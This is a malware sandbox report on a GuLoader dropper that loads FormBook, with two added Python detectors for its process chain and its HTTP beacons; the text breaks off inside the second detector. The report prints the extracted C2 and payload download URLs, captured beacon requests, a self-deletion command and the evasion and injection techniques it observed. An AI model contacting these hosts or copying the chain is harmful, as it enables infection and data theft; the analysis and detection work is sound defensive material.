Windows Analysis Report: F63V4i8eZU.exe

Overview

General Information

Sample Name: F63V4i8eZU.exe
Analysis ID: 450884
MD5: 08730cdd286a4c9d46b38bb6545ac311
SHA1: 001bb7b5b8d63e505661d7e4a178d08abe6bbad7
SHA256: cb2a2537987e45c8461d40a0ec6c24215920519257134db91dd1369ff5abf342
Tags: 32exe

Detection

GuLoader, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Potentially malicious time measurement code found
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • F63V4i8eZU.exe (PID: 1288 cmdline: 'C:\Users\user\Desktop\F63V4i8eZU.exe' MD5: 08730CDD286A4C9D46B38BB6545AC311)
    • F63V4i8eZU.exe (PID: 772 cmdline: 'C:\Users\user\Desktop\F63V4i8eZU.exe' MD5: 08730CDD286A4C9D46B38BB6545AC311)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 5756 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 6112 cmdline: /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
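The process tree above is the whole GuLoader-to-FormBook chain in one view: the sample launches a second copy of its own image (the suspended child that gets hollowed), explorer.exe appears under that child and starts a 32-bit system utility (chkdsk.exe from SysWOW64), and that utility runs cmd.exe to delete the original file. The detector below is an added example, not Joe Sandbox code. It replays constructed process-creation events that mirror the tree; the cmd.exe image path and the parent PID 4000 of the first process are assumptions, since the report does not show them.

```python
"""Process-chain detector for the GuLoader/FormBook tree shown in this report.
Added example, not Joe Sandbox code. Event records are constructed to mirror the
report's process tree; the cmd.exe image path and the parent of PID 1288 are
assumptions, as the report does not show them."""
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable, as a process-creation log records it
    cmdline: str


# Matches "/c del <path>", path optionally quoted (the sandbox rewrites " as ').
DEL_RE = re.compile(r"""(?i)/c\s+del\s+['"]?([^'"]+)""")
SYSWOW64 = "c:\\windows\\syswow64\\"
WINDIR = "c:\\windows\\"


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(tree: Dict[int, ProcEvent], pid: int) -> Iterator[ProcEvent]:
    """Walk parent links upward from pid, stopping at unknown parents or cycles."""
    seen = {pid}
    cur = tree.get(pid)
    while cur is not None and cur.ppid in tree and cur.ppid not in seen:
        cur = tree[cur.ppid]
        seen.add(cur.pid)
        yield cur


def detect_chain(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (finding, pid) pairs for the three links of the chain:
    self_spawn: a binary outside C:\\Windows launches a second copy of its own
                image (the suspended-child / hollowing pattern in the report);
    explorer_spawns_syswow64: explorer.exe launches a 32-bit system utility,
                which is how chkdsk.exe is started here;
    self_delete: cmd.exe deletes a file whose name matches an ancestor's image."""
    tree = {e.pid: e for e in events}
    findings: List[Tuple[str, int]] = []
    for e in events:
        parent = tree.get(e.ppid)
        if parent is None:
            continue
        img, pimg = e.image.lower(), parent.image.lower()
        if basename(img) == basename(pimg) and not img.startswith(WINDIR):
            findings.append(("self_spawn", e.pid))
        if basename(pimg) == "explorer.exe" and img.startswith(SYSWOW64):
            findings.append(("explorer_spawns_syswow64", e.pid))
        if basename(img) == "cmd.exe":
            m = DEL_RE.search(e.cmdline)
            if m:
                target = basename(m.group(1).strip())
                if any(basename(a.image) == target for a in ancestors(tree, e.pid)):
                    findings.append(("self_delete", e.pid))
    return findings


# Constructed events mirroring the report's tree (PIDs and command lines from the report;
# parent PID 4000 and the cmd.exe image path are assumptions).
SAMPLE_EVENTS = [
    ProcEvent(1288, 4000, r"C:\Users\user\Desktop\F63V4i8eZU.exe", r"'C:\Users\user\Desktop\F63V4i8eZU.exe'"),
    ProcEvent(772, 1288, r"C:\Users\user\Desktop\F63V4i8eZU.exe", r"'C:\Users\user\Desktop\F63V4i8eZU.exe'"),
    ProcEvent(3388, 772, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(5756, 3388, r"C:\Windows\SysWOW64\chkdsk.exe", r"C:\Windows\SysWOW64\chkdsk.exe"),
    ProcEvent(6112, 5756, r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'"),
    ProcEvent(5696, 6112, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

if __name__ == "__main__":
    for finding, pid in detect_chain(SAMPLE_EVENTS):
        print(f"{finding:<26} pid={pid}")
```

Each rule on its own is noisy (installers re-launch themselves, explorer.exe legitimately starts SysWOW64 programs); the value is in the ancestry: the `self_delete` rule only fires when the deleted file is the image of a process further up the same chain, which ties the cleanup back to the sample.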

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}

Threatname: GuLoader

{"Payload URL": "https://kinmirai.org/wp-content/bin_QVwo"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000001F.00000002.1285459135.0000000004FC5000.00000004.00000020.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x32c6c:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(18 further memory-dump matches not shown in this extract)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: F63V4i8eZU.exe; Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_QVwo"}
Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook (C2 list and decoy list as given under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: F63V4i8eZU.exe; VirusTotal: Detection: 10%
Yara detected FormBook
Source: Yara match; File source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY
Source: F63V4i8eZU.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown; HTTPS traffic detected: 133.130.104.18:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: Binary string: chkdsk.pdbGCTL; source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP; source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp
Source: Binary string: chkdsk.pdb; source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb; source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe
Source: Binary string: wntdll.pdbUGP; source: F63V4i8eZU.exe, 00000012.00000002.480375309.000000001E390000.00000040.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1285968735.0000000005440000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: F63V4i8eZU.exe, chkdsk.exe
Source: Binary string: wscui.pdb; source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 4x nop then pop edi

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.yellow-wink.com/nff/
Source: Malware configuration extractor; URLs: https://kinmirai.org/wp-content/bin_QVwo
Source: global traffic; HTTP traffic detected: GET /nff/?D48p=kOxlMsEjtzqi35JKXOQvqY0Z9Dr8MJKVGpcl7uHZUSc/duxdP9tVlajaQyGMVspbd71z&-ZgX=tR-DSFa8o HTTP/1.1 | Host: www.oubacm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=1Xxx+qd8pBTLA+WTXKo7XaXaUaa/vtHv40sNd0BzbA6K7Qnc9Dw7+srX/AipaLaYNVgg HTTP/1.1 | Host: www.mothererph.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=t6POCtyEK9WeI3wHMDqVXFf1P6NZVFBUQrx3hzUMeWhQO7zB8dJJWUZafBhAs6NE8fvj HTTP/1.1 | Host: www.howtovvbucks.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /nff/?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o HTTP/1.1 | Host: www.mikecdmusic.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=hj2zxdGwTxg/Oy5I2ijyN0fTICzPxcwPRfXb7vTf2tNSz2x0IcDR494UQaPw8xmFi6Rl HTTP/1.1 | Host: www.pacleanfuel.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /nff/?D48p=yLp+OGFnl0jg7pOzvTf//aMS5CTocG0VRGMnH1GHhYzZCkZUh0GgSDI2xq5DNsTFnZjT&-ZgX=tR-DSFa8o HTTP/1.1 | Host: www.foeweifgoor73dz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=27rvRn0KmepyxD8tf0kCiU4ghUW26GTZLquNc10L5JocjkBpiI2ubcvHzFDqc++aW5sB HTTP/1.1 | Host: www.thehomechef.global | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /nff/?D48p=BYCicstSjiimYQeLhOM2IfVFUU5xkRxUW/ddRKXtK0U5B2C8EeMnAtCjd12GxjTXIZnB&-ZgX=tR-DSFa8o HTTP/1.1 | Host: www.yellow-wink.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=CcVDHNb77dcNdWY2oqs0Q3cJ+rSEYLRnUCyMOMN+TEyN4HUBsnEuVHzuIckGNGmzeXmd HTTP/1.1 | Host: www.amazonautomationbusiness.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=cRGxEbCxtxOklbCQDq2naIaOwJUFKZbTk/bYH1mjDoD5ciZshsmVa8jbK15SYwAvUHmE HTTP/1.1 | Host: www.ooweesports.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /nff/?D48p=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8Ikvp/Bi1Hxc&-ZgX=tR-DSFa8o HTTP/1.1 | Host: www.gentrypartyof8.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=23vdk0INmHdYoMyjDJpAXxw5aErMVqufSgZPm4X7AcKozm0yVvV2ivtCtqAjwFsJpdV9 HTTP/1.1 | Host: www.dunn-labs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic; HTTP traffic detected: GET /nff/?D48p=4F7AytNRxG9Okht4XRBjCmtmhOo761MGK9UHRz2K68ko8sG2VRn93GfHKNzVTrlp6vls&-ZgX=tR-DSFa8o HTTP/1.1 | Host: www.tearor.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: Joe Sandbox View; IP Address: 198.50.252.64
Source: Joe Sandbox View; IP Address: 212.32.237.90
Source: Joe Sandbox View; ASN Name: OVHFR
Source: Joe Sandbox View; ASN Name: GOOGLE-2US
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp; String found in binary or memory: <a href="https://www.facebook.com/InstraCorp" target="_blank" rel="nofollow"><i class="fa fa-facebook"></i></a> equals www.facebook.com (Facebook)
Source: unknown; DNS traffic detected: queries for: kinmirai.org
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 19 Jul 2021 18:23:41 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: explorer.exe, 0000001D.00000000.448268826.00000000089F9000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe; String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe; String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe; String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp; String found in binary or memory: http://farmersschool.ge/bin_QVwEr224.bin
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe; String found in binary or memory: http://ocsp.digicert.com0C
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe; String found in binary or memory: http://ocsp.digicert.com0O
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp; String found in binary or memory: http://survey-smiles.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe; String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp; String found in binary or memory: https://fonts.googleapis.com/css?family=Lato:300
Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp; String found in binary or memory: https://kinmirai.org/wp-content/bin_QVwEr224.bin
Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp; String found in binary or memory: https://kinmirai.org/wp-content/bin_QVwEr224.binhttp://farmersschool.ge/bin_QVwEr224.binwininet.dllM
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp; String found in binary or memory: https://twitter.com/instra
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe; String found in binary or memory: https://www.digicert.com/CPS0
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp; String found in binary or memory: https://www.instra.com/?utm_medium=free_parking&utm_source=thehomechef.global
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp; String found in binary or memory: https://www.instra.com/en/hosting/web-hosting-packages/?utm_medium=free_parking&utm_source=thehomech
Source: unknown; Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown; HTTPS traffic detected: 133.130.104.18:443 -> 192.168.2.3:49746 version: TLS 1.2
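Every GET in the traffic listed above has the same shape: the path /nff/ from the configuration, exactly two query parameters (a short value under -ZgX and a long opaque blob under D48p, in either order), Connection: close and no User-Agent, sent to the real C2 www.yellow-wink.com and to the configuration's decoy domains alike. The detector below is an added example, not Joe Sandbox code, that turns that shape into a check over raw captured requests and then correlates across hosts. The sample requests are constructed from four of the report's GETs plus one benign browser request; the thresholds (blob length, short-value length, minimum distinct hosts) are assumptions tuned to this report.

```python
"""Detect FormBook-style HTTP beaconing from raw GET requests like those captured above.
Added example, not Joe Sandbox code. Thresholds are assumptions tuned to the requests in
this report; the sample requests are constructed from the report's traffic."""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple
from urllib.parse import urlsplit

# One long opaque value (the report's D48p values are ~68 base64-like chars) next to
# one short value (-ZgX=tR-DSFa8o). Both bounds are assumptions.
BLOB_RE = re.compile(r"^[A-Za-z0-9+/_-]{40,}={0,2}$")
MAX_SHORT = 16


def split_query(query: str) -> List[Tuple[str, str]]:
    """Split a query string without decoding: parse_qsl would turn '+' into ' '
    and mangle the base64-like blob."""
    return [tuple(kv.partition("=")[::2]) for kv in query.split("&") if kv]


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Minimal HTTP/1.1 request parser: request line plus headers (lower-cased names)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def is_formbook_like(method: str, target: str, headers: Dict[str, str]) -> bool:
    """GET, exactly two parameters (one short, one long opaque blob), no User-Agent,
    Connection: close: the shape of every beacon in the report."""
    params = split_query(urlsplit(target).query)
    if method != "GET" or len(params) != 2:
        return False
    short, long_ = sorted((v for _, v in params), key=len)
    return (len(short) <= MAX_SHORT
            and BLOB_RE.match(long_) is not None
            and "user-agent" not in headers
            and headers.get("connection", "").lower() == "close")


def find_beacon_campaigns(raw_requests: List[str], min_hosts: int = 3) -> Dict[Tuple[str, Tuple[str, ...]], List[str]]:
    """Group beacon-shaped requests by (path, sorted parameter names) and return the
    groups seen against at least min_hosts distinct Host values. FormBook sends the
    same URI to its real C2 and to its decoys, so the spread across hosts is the signal."""
    groups: Dict[Tuple[str, Tuple[str, ...]], Set[str]] = defaultdict(set)
    for raw in raw_requests:
        method, target, headers = parse_request(raw)
        if not is_formbook_like(method, target, headers):
            continue
        parts = urlsplit(target)
        key = (parts.path, tuple(sorted(k for k, _ in split_query(parts.query))))
        groups[key].add(headers.get("host", "").lower())
    return {key: sorted(hosts) for key, hosts in groups.items() if len(hosts) >= min_hosts}


def _req(path_and_query: str, host: str, user_agent: str = "") -> str:
    """Build a raw request for the constructed sample set."""
    hdrs = [f"GET {path_and_query} HTTP/1.1", f"Host: {host}"]
    if user_agent:
        hdrs.append(f"User-Agent: {user_agent}")
    hdrs.append("Connection: close")
    return "\r\n".join(hdrs) + "\r\n\r\n"


# Constructed from four of the report's captured GETs, plus one benign browser request.
SAMPLE_REQUESTS = [
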